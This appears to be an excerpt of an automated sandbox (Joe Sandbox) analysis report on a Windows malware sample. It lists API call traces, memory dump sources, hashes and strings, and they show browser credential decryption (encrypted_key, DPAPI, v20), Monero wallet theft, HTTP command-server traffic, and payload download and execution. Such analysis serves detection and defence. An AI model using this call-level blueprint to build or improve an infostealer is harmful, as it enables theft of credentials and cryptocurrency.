                                                  • lstrcatA.KERNEL32(?,00878FD0), ref: 0041430B
                                                  • lstrcatA.KERNEL32(?,?), ref: 0041431F
                                                  • lstrcatA.KERNEL32(?,008793A8), ref: 00414333
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                                    • Part of subcall function 00409CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                                    • Part of subcall function 00409CE0: memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                    • Part of subcall function 004193C0: GlobalAlloc.KERNEL32(00000000,004143DD,004143DD), ref: 004193D3
                                                  • StrStrA.SHLWAPI(?,00879078), ref: 004143F3
                                                  • GlobalFree.KERNEL32(?), ref: 00414512
                                                    • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409AEF
                                                    • Part of subcall function 00409AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00404EEE,00000000,?), ref: 00409B01
                                                    • Part of subcall function 00409AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N@,00000000,00000000), ref: 00409B2A
                                                    • Part of subcall function 00409AC0: LocalFree.KERNEL32(?,?,?,?,00404EEE,00000000,?), ref: 00409B3F
                                                    • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 004144A3
                                                  • StrCmpCA.SHLWAPI(?,004208D1), ref: 004144C0
                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 004144D2
                                                  • lstrcatA.KERNEL32(00000000,?), ref: 004144E5
                                                  • lstrcatA.KERNEL32(00000000,00420FB8), ref: 004144F4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                  • String ID:
                                                  • API String ID: 1191620704-0
                                                  • Opcode ID: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                                  • Instruction ID: 36ee7f3ac4f34f2e69ac811a17adbc1f593ee72d5fdd25ff7e799b1d0bb6bc25
                                                  • Opcode Fuzzy Hash: 0c9d0826f05218bba3054023445b60d50c1f9f43ea0f6b816602f798d9ef3330
                                                  • Instruction Fuzzy Hash: 0B7165B6900208BBDB14FBE0DC85FEE7379AB88304F00459DF605A7181EA78DB55CB95
                                                  APIs
                                                  • memset.MSVCRT ref: 00401327
                                                    • Part of subcall function 004012A0: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 004012B4
                                                    • Part of subcall function 004012A0: HeapAlloc.KERNEL32(00000000), ref: 004012BB
                                                    • Part of subcall function 004012A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 004012D7
                                                    • Part of subcall function 004012A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012F5
                                                    • Part of subcall function 004012A0: RegCloseKey.ADVAPI32(?), ref: 004012FF
                                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040134F
                                                  • lstrlenA.KERNEL32(?), ref: 0040135C
                                                  • lstrcatA.KERNEL32(?,.keys), ref: 00401377
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00844840,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                  • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401465
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
                                                    • Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
                                                    • Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
                                                    • Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
                                                    • Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
                                                    • Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A
                                                  • DeleteFileA.KERNEL32(00000000), ref: 004014EF
                                                  • memset.MSVCRT ref: 00401516
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Filelstrcpy$lstrcat$AllocCloseHeapLocallstrlenmemset$CopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                                  • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                                                  • API String ID: 1930502592-218353709
                                                  • Opcode ID: c1fb2d75e00c2d8f9dd5bf80775ae3441aa8fa7fb470dcc05c1c23cbe7dc55a4
                                                  • Instruction ID: 674d48b949cffd92695f0a4f51b6d393b2dd06dcaa63b8f6d50fb5eb71b8da29
                                                  • Opcode Fuzzy Hash: c1fb2d75e00c2d8f9dd5bf80775ae3441aa8fa7fb470dcc05c1c23cbe7dc55a4
                                                  • Instruction Fuzzy Hash: AA5164B195011897CB15FB61DD91BED733CAF54304F4041ADB60A62091EE385BDACBAA
                                                  APIs
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 00406280: InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 004062E1
                                                    • Part of subcall function 00406280: StrCmpCA.SHLWAPI(?,0087B030), ref: 00406303
                                                    • Part of subcall function 00406280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406335
                                                    • Part of subcall function 00406280: HttpOpenRequestA.WININET(00000000,GET,?,0087A1B8,00000000,00000000,00400100,00000000), ref: 00406385
                                                    • Part of subcall function 00406280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004063BF
                                                    • Part of subcall function 00406280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004063D1
                                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00415318
                                                  • lstrlenA.KERNEL32(00000000), ref: 0041532F
                                                    • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                                  • StrStrA.SHLWAPI(00000000,00000000), ref: 00415364
                                                  • lstrlenA.KERNEL32(00000000), ref: 00415383
                                                  • strtok.MSVCRT(00000000,?), ref: 0041539E
                                                  • lstrlenA.KERNEL32(00000000), ref: 004153AE
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSendstrtok
                                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                  • API String ID: 3532888709-1526165396
                                                  • Opcode ID: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                                  • Instruction ID: 2e955e57ea7f1c083e6e45f715f374ff83ee784ca3e0e9be4ff8c8b21657e330
                                                  • Opcode Fuzzy Hash: 55afdb5b044d9d0ae2ca40548a036d1fafadf4502d9a6ff2b082a7fa121a3b9b
                                                  • Instruction Fuzzy Hash: 1A514130911108EBCB14FF61CD92AED7779AF50358F50402EF80A6B591DF386B96CB6A
                                                  APIs
                                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                                    • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                                    • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                                  • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 0040610F
                                                  • StrCmpCA.SHLWAPI(?,0087B030), ref: 00406147
                                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0040618F
                                                  • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 004061B3
                                                  • InternetReadFile.WININET(a+A,?,00000400,?), ref: 004061DC
                                                  • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040620A
                                                  • CloseHandle.KERNEL32(?,?,00000400), ref: 00406249
                                                  • InternetCloseHandle.WININET(a+A), ref: 00406253
                                                  • InternetCloseHandle.WININET(00000000), ref: 00406260
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                  • String ID: a+A$a+A
                                                  • API String ID: 4287319946-2847607090
                                                  • Opcode ID: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                                  • Instruction ID: d3b4a7caf446de9355e244355c8e16b321895ac976a44b0a7cc1b08be2cc8b72
                                                  • Opcode Fuzzy Hash: 4f54e106c83d2cad8501facd8a7162983f10c7e98b0fc324723d48a002eab14d
                                                  • Instruction Fuzzy Hash: 735194B5940218ABDB20EF90DC45BEE77B9EB04305F1040ADB606B71C0DB786A85CF9A
                                                  APIs
                                                    • Part of subcall function 00B4A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B4A9EF
                                                  • memset.MSVCRT ref: 00B40E83
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B40E9C
                                                  • lstrcat.KERNEL32(?,00420D7C), ref: 00B40EAE
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B40EC4
                                                  • lstrcat.KERNEL32(?,00420D80), ref: 00B40ED6
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B40EEF
                                                  • lstrcat.KERNEL32(?,00420D84), ref: 00B40F01
                                                  • lstrlen.KERNEL32(?), ref: 00B40F0E
                                                  • memset.MSVCRT ref: 00B40F34
                                                  • memset.MSVCRT ref: 00B40F48
                                                    • Part of subcall function 00B4AA87: lstrlen.KERNEL32(00B3516C,?,?,00B3516C,00420DDE), ref: 00B4AA92
                                                    • Part of subcall function 00B4AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 00B4AAEC
                                                    • Part of subcall function 00B48DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B31660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B48DED
                                                    • Part of subcall function 00B4AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B4ABD9
                                                    • Part of subcall function 00B4AB87: lstrcat.KERNEL32(00000000), ref: 00B4ABE9
                                                    • Part of subcall function 00B4AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B4AC2C
                                                    • Part of subcall function 00B4AC17: lstrcpy.KERNEL32(00000000), ref: 00B4AC6B
                                                    • Part of subcall function 00B4AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B4AC79
                                                    • Part of subcall function 00B4AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B4AB6C
                                                    • Part of subcall function 00B4AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B4AA4D
                                                    • Part of subcall function 00B49927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00B40DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 00B49948
                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00B40FC1
                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B40FCD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                  • String ID:
                                                  • API String ID: 1395395982-0
                                                  • Opcode ID: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                                  • Instruction ID: 27a227426dfb6c3f0de04a8dde3fd33fdd675f56ad8a02889a5e6a165649be4c
                                                  • Opcode Fuzzy Hash: 611dee48b04e9e0e2afdbc6d63dcd8839025fdd060787a2fa850c35645432629
                                                  • Instruction Fuzzy Hash: 0981A5F59802186BCB14EBA0CD82FED77B9AF44704F0041D8B70566082EF746B88DF5A
                                                  APIs
                                                    • Part of subcall function 00B4A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B4A9EF
                                                  • memset.MSVCRT ref: 00B40E83
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B40E9C
                                                  • lstrcat.KERNEL32(?,00420D7C), ref: 00B40EAE
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B40EC4
                                                  • lstrcat.KERNEL32(?,00420D80), ref: 00B40ED6
                                                  • lstrcat.KERNEL32(?,00000000), ref: 00B40EEF
                                                  • lstrcat.KERNEL32(?,00420D84), ref: 00B40F01
                                                  • lstrlen.KERNEL32(?), ref: 00B40F0E
                                                  • memset.MSVCRT ref: 00B40F34
                                                  • memset.MSVCRT ref: 00B40F48
                                                    • Part of subcall function 00B4AA87: lstrlen.KERNEL32(00B3516C,?,?,00B3516C,00420DDE), ref: 00B4AA92
                                                    • Part of subcall function 00B4AA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 00B4AAEC
                                                    • Part of subcall function 00B48DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,00B31660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 00B48DED
                                                    • Part of subcall function 00B4AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B4ABD9
                                                    • Part of subcall function 00B4AB87: lstrcat.KERNEL32(00000000), ref: 00B4ABE9
                                                    • Part of subcall function 00B4AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B4AC2C
                                                    • Part of subcall function 00B4AC17: lstrcpy.KERNEL32(00000000), ref: 00B4AC6B
                                                    • Part of subcall function 00B4AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B4AC79
                                                    • Part of subcall function 00B4AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B4AB6C
                                                    • Part of subcall function 00B4AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B4AA4D
                                                    • Part of subcall function 00B49927: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00B40DEC,?,00000000,?,00000000,004205C6,004205C5), ref: 00B49948
                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00B40FC1
                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B40FCD
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                                  • String ID:
                                                  • API String ID: 1395395982-0
                                                  • Opcode ID: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                                  • Instruction ID: 2028c4038d80d77fdcf3a0c25a475320127ec82f3d261f96a9f812f2232e67b0
                                                  • Opcode Fuzzy Hash: 5f02957f32bc588cc3f78102301ac57cffd73d36a7e7861b7e9dc44853b35b92
                                                  • Instruction Fuzzy Hash: 8761A2F5980218ABCB14EBA0CD86FED7778AF44704F0041E9F70566082EE746B88DF5A
                                                  APIs
                                                    • Part of subcall function 00B4AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B4AA4D
                                                    • Part of subcall function 00B34A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B34A51
                                                    • Part of subcall function 00B34A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B34A68
                                                    • Part of subcall function 00B34A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B34A7F
                                                    • Part of subcall function 00B34A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B34AA0
                                                    • Part of subcall function 00B34A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B34AB0
                                                    • Part of subcall function 00B4A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B4A9EF
                                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00B34B7C
                                                  • StrCmpCA.SHLWAPI(?,0064A480), ref: 00B34BA1
                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B34D21
                                                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,00421988,00000000,?,0064A514), ref: 00B3504F
                                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00B3506B
                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00B3507F
                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00B350B0
                                                  • InternetCloseHandle.WININET(00000000), ref: 00B35114
                                                  • InternetCloseHandle.WININET(00000000), ref: 00B3512C
                                                  • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 00B34D7C
                                                    • Part of subcall function 00B4AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 00B4AC2C
                                                    • Part of subcall function 00B4AC17: lstrcpy.KERNEL32(00000000), ref: 00B4AC6B
                                                    • Part of subcall function 00B4AC17: lstrcat.KERNEL32(00000000,00000000), ref: 00B4AC79
                                                    • Part of subcall function 00B4AB07: lstrcpy.KERNEL32(?,00420E17), ref: 00B4AB6C
                                                    • Part of subcall function 00B4AB87: lstrcpy.KERNEL32(00000000,?), ref: 00B4ABD9
                                                    • Part of subcall function 00B4AB87: lstrcat.KERNEL32(00000000), ref: 00B4ABE9
                                                  • InternetCloseHandle.WININET(00000000), ref: 00B35136
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                                  • String ID:
                                                  • API String ID: 2402878923-0
                                                  • Opcode ID: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                                  • Instruction ID: 678f6ddd399c5f15a0ddf31f238a884f3c943617fd544ff0ece16c887fbd2e2f
                                                  • Opcode Fuzzy Hash: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                                  • Instruction Fuzzy Hash: 2912F0B1990218AACB15EB94DD92FEEB7B9AF14700F5041D9F14672091DF702F88DF52
                                                  APIs
                                                    • Part of subcall function 00B4AA07: lstrcpy.KERNEL32(?,00000000), ref: 00B4AA4D
                                                    • Part of subcall function 00B34A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B34A51
                                                    • Part of subcall function 00B34A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B34A68
                                                    • Part of subcall function 00B34A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00B34A7F
                                                    • Part of subcall function 00B34A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B34AA0
                                                    • Part of subcall function 00B34A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B34AB0
                                                    • Part of subcall function 00B4A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 00B4A9EF
                                                  • InternetOpenA.WININET(00420DFE,00000001,00000000,00000000,00000000), ref: 00B36548
                                                  • StrCmpCA.SHLWAPI(?,0064A480), ref: 00B3656A
                                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B3659C
                                                  • HttpOpenRequestA.WININET(00000000,00421A28,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 00B365EC
                                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00B36626
                                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B36638
                                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00B36664
                                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00B366D4
                                                  • InternetCloseHandle.WININET(00000000), ref: 00B36756
                                                  • InternetCloseHandle.WININET(00000000), ref: 00B36760
                                                  • InternetCloseHandle.WININET(00000000), ref: 00B3676A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Internet$??2@CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                                  • String ID:
                                                  • API String ID: 3074848878-0
                                                  • Opcode ID: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                                  • Instruction ID: 5c6ab08b1d930798b203c93649a3a783ab64a527e8cd8105172356ff3b2807ac
                                                  • Opcode Fuzzy Hash: 6233cd159639085ce3b028a95152e179a77ccdecf231ea1e95f5afa63e354fd7
                                                  • Instruction Fuzzy Hash: DC714E75A40218EBDB24DFA4DC89BEE77B5EB44700F608199F5066B190DBB46F84CF41
                                                  APIs
                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00B492D3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2280246170.0000000000B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B30000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_1vYjXDbKHt.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CreateGlobalStream
                                                  • String ID:
                                                  • API String ID: 2244384528-0
                                                  • Opcode ID: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                                  • Instruction ID: dd88da8f037d70f6576665fc74e9e0c10ccf7e2466ebf20c8940c2bfc6d4fbe6
                                                  • Opcode Fuzzy Hash: f19ccceb9d9d465938ce7f290bd949bbae8562b5bf3b96ffc27cc6e5329703af
                                                  • Instruction Fuzzy Hash: AE71FBB9A40208EBDB14DFE4DC89FEEB7B9EB49300F108548F515A7290DB74AA05DB61
                                                  APIs
                                                  • ??_U@YAPAXI@Z.MSVCRT(00064000), ref: 004170DE
                                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,0041730D,004205BD), ref: 0041711C
                                                  • memset.MSVCRT ref: 0041716A
                                                  • ??_V@YAXPAX@Z.MSVCRT(?), ref: 004172BE
                                                  Strings
                                                  • sA, xrefs: 004172AE, 00417179, 0041717C
                                                  • sA, xrefs: 00417111
                                                  • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0041718C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2279322736.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2279322736.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2279322736.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
